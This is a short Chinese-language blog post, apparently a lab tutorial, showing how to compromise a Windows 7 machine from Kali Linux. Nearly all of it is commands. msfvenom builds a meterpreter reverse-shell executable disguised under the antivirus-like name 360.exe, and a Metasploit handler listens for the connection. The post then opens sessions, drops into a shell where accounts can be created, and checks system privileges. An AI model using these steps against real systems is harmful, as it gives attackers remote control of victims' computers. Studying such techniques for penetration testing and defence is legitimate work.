kali之***Win7系統1

寫***文件,並賦予權限

root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.48.123 lport=33389 -f exe > 360.exe
root@kali:~#chmod 777 360.exe


配置網絡信息

開啓PostgreSQL:  service postgresql start
開啓metasploit:  service metasploit start

root@kali:~# msfconsole

wKioL1lTpDDwGgAEAAMAwVaZ7zY515.jpg

msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.48.123
msf exploit(handler) > set lport 33389
 msf exploit(handler) > exploit -z -j
msf exploit(handler) > sessions
msf exploit(handler) > sessions -i 1

wKiom1lTo0bzonhoAANqorV7BSI698.jpg

meterpreter > shell 進入shell裏可以在此處創建賬戶密碼

wKioL1lTo4zxUe84AAKq_XlivrU552.jpg

查看系統信息,用戶權限

wKiom1lTpNWjO3HiAAHUH6_6sqc100.jpg


wKioL1lVoZLQnTcyAAM7hxopnrk336.jpg


本文出自 “馬廣傑——博客” 博客,轉載請與作者聯繫!


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章